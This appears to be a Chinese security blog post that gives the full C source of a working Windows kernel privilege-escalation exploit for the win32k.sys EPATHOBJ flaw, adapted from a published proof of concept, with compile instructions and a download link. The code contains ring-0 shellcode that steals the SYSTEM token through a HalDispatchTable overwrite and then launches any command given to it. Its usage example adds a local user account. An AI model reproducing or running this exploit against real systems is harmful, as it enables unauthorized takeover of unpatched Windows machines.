迟来的6.1礼物 EPATHOBJ 0day exploit

avis Ormandy 在做压力测试的时候发现的这个漏洞.

see:
http://blog.cmpxchg8b.com/
http://seclists.org/fulldisclosure/2013/May/118

点击这里下载文件: EPATHOBJExploit.rar

[PHP]

#include
#include
#include
#include
//#include

#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")

#define MAX_POLYPOINTS (8192 * 3)
#define MAX_REGIONS 8192
#define CYCLE_TIMEOUT 10000

#pragma comment(linker, "/SECTION:.text,ERW")

//
// win32k!EPATHOBJ::pprFlattenRec uninitialized Next pointer testcase.
//
// Tavis Ormandy , March 2013
//

POINT       Points[MAX_POLYPOINTS];
BYTE        PointTypes[MAX_POLYPOINTS];
HRGN        Regions[MAX_REGIONS];
ULONG       NumRegion = 0;
HANDLE      Mutex;

// Log levels.
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;

VOID LogInit();
VOID LogRelase();
BOOL LogMessage(LEVEL Level, PCHAR Format, ...);

// Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH   0x00000001
#define PD_ENDSUBPATH     0x00000002
#define PD_RESETSTYLE     0x00000004
#define PD_CLOSEFIGURE    0x00000008
#define PD_BEZIERS        0x00000010

#define ENABLE_SWITCH_DESKTOP  1

typedef struct  _POINTFIX
{
ULONG x;
ULONG y;
} POINTFIX, *PPOINTFIX;

// Approximated from reverse engineering.
typedef struct _PATHRECORD {
struct _PATHRECORD *next;
struct _PATHRECORD *prev;
ULONG               flags;
ULONG               count;
POINTFIX            points[4];
} PATHRECORD, *PPATHRECORD;

PPATHRECORD PathRecord;
PATHRECORD  ExploitRecord = {0};
PPATHRECORD ExploitRecordExit;

typedef struct _RTL_PROCESS_MODULE_INFORMATION {
HANDLE Section;                 // Not filled in
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR  FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

typedef struct _RTL_PROCESS_MODULES {
ULONG NumberOfModules;
RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
typedef ULONG ( __stdcall *NtFreeVirtualMemory_)( HANDLE, PVOID, PULONG, ULONG);

NtQueryIntervalProfile_  NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;
NtFreeVirtualMemory_ NtFreeVirtualMemory;
ULONG    PsInitialSystemProcess, PsReferencePrimaryToken,
PsGetThreadProcess, WriteToHalDispatchTable, FixAddress;

void _declspec(naked) ShellCode()
{
__asm
{
pushad
pushfd
mov esi,PsReferencePrimaryToken
FindTokenOffset:
lodsb
cmp al, 8Dh;
jnz FindTokenOffset
mov edi,[esi+1]
mov esi,PsInitialSystemProcess
mov esi,[esi]
push fs:[124h]
mov eax,PsGetThreadProcess
call eax
add esi, edi
push esi
add edi, eax
movsd

;add token ref count.
pop esi
mov esi, [esi]
and esi, 0xFFFFFFF8
lea eax, [esi-0x18]
mov DWORD PTR [eax], 0x016B00B5
;fix the haltable
mov eax, WriteToHalDispatchTable
mov ecx, FixAddress
mov [ecx], 0xC3
mov DWORD PTR [eax], ecx

popfd
popad
;set ret code for NtQueryIntervalProfile
mov eax, [esp+0xc]
mov DWORD PTR [eax+4], 1
mov DWORD PTR [eax+8], 0xC0000018
xor eax, eax
ret
}
}

DWORD WINAPI WatchdogThread(LPVOID Parameter)
{
//
// This routine waits for a mutex object to timeout, then patches the
// compromised linked list to point to an exploit. We need to do this.
//

LogMessage(L_INFO, "Watchdog thread %d waiting on Mutex", GetCurrentThreadId());

if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {

//
// It looks like the main thread is stuck in a call to FlattenPath(),
// because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
// up, and then patch the list to trigger our exploit.
//

while (NumRegion--)
DeleteObject(Regions[NumRegion]);

LogMessage(L_ERROR, "InterlockedExchange(0x%08x, 0x%08x);", &PathRecord->next, &ExploitRecord);

InterlockedExchange((PLONG)&PathRecord->next, (LONG)&ExploitRecord);

} else {
LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
}

return 0;
}

void wellcome()
{
printf("\t\tthe win32k.sys EPATHOBJ 0day exploit\n");
printf("*******************************************************************\n");
printf("***\texploit by: \t\t***\n");
printf("***\t0day finder: \t***\n");
printf("***\ttested system:xp/2003/win7/2008 (*32bit*)\t\t***\n");
printf("*******************************************************************\n");
}

void usage()
{
printf("\nusage:\n \n");
printf("example:\napp.exe net \"user 111 111 /add\"");
}

BOOL
FindAFixAddress(
ULONG NtoskrnlBase)
{
FixAddress = NtoskrnlBase + FIELD_OFFSET(IMAGE_DOS_HEADER, e_res2);
LogMessage(L_INFO, "Get FixAddress --> 0x%08x", FixAddress);
return TRUE;

}

// 0x602464FF; /*jmp esp+0x60*/
// 0x51C3686A; /*push 0; ret*/
DWORD CheckMagicDword()
{
OSVERSIONINFOEX OSVer;
DWORD dwMagic = 0;

OSVer.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
if(GetVersionEx((OSVERSIONINFO *)&OSVer)){
switch(OSVer.dwMajorVersion){
case 5:
dwMagic = 0x602464FF;
break;
case 6:
dwMagic = 0x642464FF;
break;
default:
dwMagic = 0;
}
}
return dwMagic;
}

int main(int argc, char **argv)
{
HANDLE      Thread;
HDC         Device;
ULONG       Size;
ULONG       PointNum;
int nret = 0;

DWORD MAGIC_DWORD = CheckMagicDword();
ULONG AllocSize = 0x1000, status, NtoskrnlBase;
RTL_PROCESS_MODULES  module;
HMODULE ntoskrnl = NULL;
DWORD dwFix;
ULONG Address = MAGIC_DWORD & 0xFFFFF000;
LONG ret;
BOOL bRet = FALSE;
#ifdef ENABLE_SWITCH_DESKTOP
HDESK hDesk;
#endif
HMODULE  ntdll = GetModuleHandle( "ntdll.dll" );

wellcome();

if (argc < 2){ usage(); return -1; } if (!MAGIC_DWORD){ LogMessage(L_ERROR, "unsupported system version\n"); return -1; } LogInit(); NtQueryIntervalProfile    =  (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" ); NtAllocateVirtualMemory    =  (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" ); NtQuerySystemInformation  =  (NtQuerySystemInformation_)GetProcAddress( ntdll ,"NtQuerySystemInformation" ); NtFreeVirtualMemory =  (NtFreeVirtualMemory_)GetProcAddress( ntdll ,"NtFreeVirtualMemory" ); if ( !NtQueryIntervalProfile || !NtAllocateVirtualMemory || !NtQuerySystemInformation || !NtFreeVirtualMemory){ LogMessage(L_ERROR, "get function address error\n"); LogRelase(); return -1; } // // try to allocate memory. // while (TRUE){ ret = NtAllocateVirtualMemory( (HANDLE)-1, &Address, 0, &AllocSize, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); if(ret < 0){ MEMORY_BASIC_INFORMATION meminfo; LogMessage(L_ERROR, "allocate memory error code 0x%08x", ret); LogMessage(L_INFO, "try to free memory"); if(VirtualQuery((LPVOID)Address, &meminfo, sizeof(meminfo))){ LogMessage(L_INFO, "meminfo state %d %d\n", meminfo.State, meminfo.Protect); } ret = NtFreeVirtualMemory((HANDLE)-1, &Address, &AllocSize, MEM_RELEASE); if (ret < 0){ LogMessage(L_ERROR, "free memory error code 0x%08x", ret); LogRelase(); return -1; } }else{ break; } } // // get the kernel info // status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11 if ( status != 0xC0000004 ){ LogMessage(L_ERROR, "NtQuerySystemInformation error code:0x%08x\n", status); LogRelase(); return -1; } NtoskrnlBase     =  (ULONG)module.Modules[0].ImageBase; // // 把ntoskrnl.exe加载进来 // ntoskrnl = LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) ); if (ntoskrnl == NULL){ LogMessage(L_ERROR, "LoadLibraryA error code:0x%08x\n", GetLastError()); LogRelase(); return -1; } // // 计算实际地址 // WriteToHalDispatchTable =  (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4; PsInitialSystemProcess =  (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase; PsReferencePrimaryToken = (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase; PsGetThreadProcess =  (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase; if(!FindAFixAddress(NtoskrnlBase)){ LogMessage(L_ERROR, "Can not Find A Fix Address\n"); nret = -1; goto __end; } // // Create our PATHRECORD in user space we will get added to the EPATHOBJ // pathrecord chain. // PathRecord = (PPATHRECORD)VirtualAlloc(NULL, sizeof(PATHRECORD), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); LogMessage(L_INFO, "Alllocated userspace PATHRECORD () %p", PathRecord); // // Initialize with recognizable debugging values. // FillMemory(PathRecord, sizeof(PATHRECORD), 0xCC); PathRecord->next    = PathRecord;
PathRecord->prev    = (PPATHRECORD)(0x42424242);

//
// You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from
// EPATHOBJ::bFlatten(). We don't set it so that we can trigger an infinite
// loop in EPATHOBJ::bFlatten().
//

PathRecord->flags   = 0;

LogMessage(L_INFO, "  ->next  @ %p", PathRecord->next);
LogMessage(L_INFO, "  ->prev  @ %p", PathRecord->prev);
LogMessage(L_INFO, "  ->flags @ %u", PathRecord->flags);

ExploitRecordExit = (PPATHRECORD)MAGIC_DWORD;
ExploitRecordExit->next = NULL;
ExploitRecordExit->next = NULL;
ExploitRecordExit->flags = PD_BEGINSUBPATH;
ExploitRecordExit->count = 0;

ExploitRecord.next  = (PPATHRECORD)MAGIC_DWORD;
ExploitRecord.prev  = (PPATHRECORD)WriteToHalDispatchTable;
ExploitRecord.flags = PD_BEZIERS | PD_BEGINSUBPATH;
ExploitRecord.count = 4;

LogMessage(L_INFO, "Creating complex bezier path with %x", (ULONG)(PathRecord) >> 4);

//
// Generate a large number of Belier Curves made up of pointers to our
// PATHRECORD object.
//

for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) { Points[PointNum].x      = (ULONG)(PathRecord) >> 4;
Points[PointNum].y      = (ULONG)(PathRecord) >> 4;
PointTypes[PointNum]    = PT_BEZIERTO;
}

//
// Switch to a dedicated desktop so we don't spam the visible desktop with
// our Lines (Not required, just stops the screen from redrawing slowly).
//
#ifdef ENABLE_SWITCH_DESKTOP
hDesk = CreateDesktop( "DontPanic",
NULL,
NULL,
0,
GENERIC_ALL,
NULL);
if (hDesk){
SetThreadDesktop(hDesk);
}
#endif

while (TRUE){

BOOL bBreak = FALSE;

Mutex = CreateMutex(NULL, TRUE, NULL);
if (!Mutex){
LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion);
nret = -1;
goto __end;
}

//
// Get a handle to this Desktop.
//

Device = GetDC(NULL);

//
// Spawn a thread to cleanup
//

Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL);

LogMessage(L_INFO, "start CreateRoundRectRgn");

//
// We need to cause a specific AllocObject() to fail to trigger the
// exploitable condition. To do this, I create a large number of rounded
// rectangular regions until they start failing. I don't think it matters
// what you use to exhaust paged memory, there is probably a better way.
//
// I don't use the simpler CreateRectRgn() because it leaks a GDI handle on
// failure. Seriously, do some damn QA Microsoft, wtf.
//

for (Size = 1 << 26; Size; Size >>= 1) {
while (TRUE){
HRGN hm = CreateRoundRectRgn(0, 0, 1, Size, 1, 1);
if (!hm){
break;
}
if (NumRegion < MAX_REGIONS){ Regions[NumRegion] = hm; NumRegion++; }else{ NumRegion = 0; } } } LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion); LogMessage(L_INFO, "Flattening curves..."); // // Begin filling the free list with our points. // dwFix = *(PULONG)ShellCode; for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) { BeginPath(Device); PolyDraw(Device, Points, PointTypes, PointNum); EndPath(Device); FlattenPath(Device); FlattenPath(Device); // // call the function to exploit. // ret = NtQueryIntervalProfile(2, (PULONG)ShellCode); // // we will set the status with 0xC0000018 in ring0 shellcode. // if (*(PULONG)ShellCode == 0xC0000018){ bRet = TRUE; break; } // // fix // *(PULONG)ShellCode = dwFix; EndPath(Device); } if (bRet){ LogMessage(L_INFO, "Exploit ok run command"); ShellExecute( NULL, "open", argv[1], argc > 2 ? argv[2] : NULL, NULL, SW_SHOW);
bBreak = TRUE;
}else{
LogMessage(L_INFO, "No luck, cleaning up. and try again..");
}

//
// If we reach here, we didn't trigger the condition. Let the other thread know.
//

ReleaseMutex(Mutex);

ReleaseDC(NULL, Device);
WaitForSingleObject(Thread, INFINITE);

if (bBreak){
break;
}

}
__end:
LogRelase();
if (ntoskrnl)
FreeLibrary(ntoskrnl);
#ifdef ENABLE_SWITCH_DESKTOP
if (hDesk){
CloseHandle(hDesk);
}
#endif
return nret;
}

CRITICAL_SECTION gCSection;

VOID LogInit()
{
InitializeCriticalSection(&gCSection);
}

VOID LogRelase()
{
DeleteCriticalSection(&gCSection);
}

//
// A quick logging routine for debug messages.
//

BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
{
CHAR Buffer[1024] = {0};
va_list Args;

EnterCriticalSection(&gCSection);

va_start(Args, Format);
_snprintf(Buffer, sizeof(Buffer), Format, Args);
va_end(Args);

switch (Level) {
case L_DEBUG: fprintf(stdout, "[?] %s\n", Buffer); break;
case L_INFO:  fprintf(stdout, "[+] %s\n", Buffer); break;
case L_WARN:  fprintf(stderr, "[*] %s\n", Buffer); break;
case L_ERROR: fprintf(stderr, "[!] %s\n", Buffer); break;
}

fflush(stdout);
fflush(stderr);

LeaveCriticalSection(&gCSection);

return TRUE;
}

[/PHP]

编译方式:vc6 release.
感谢Tavis Ormandy,以及其提供的poc

test on win7:

还没有评论,快来抢沙发!

发表评论

  • 😉
  • 😐
  • 😡
  • 😈
  • 🙂
  • 😯
  • 🙁
  • 🙄
  • 😛
  • 😳
  • 😮
  • emoji-mrgree
  • 😆
  • 💡
  • 😀
  • 👿
  • 😥
  • 😎
  • ➡
  • 😕
  • ❓
  • ❗
  • 70 queries in 0.435 seconds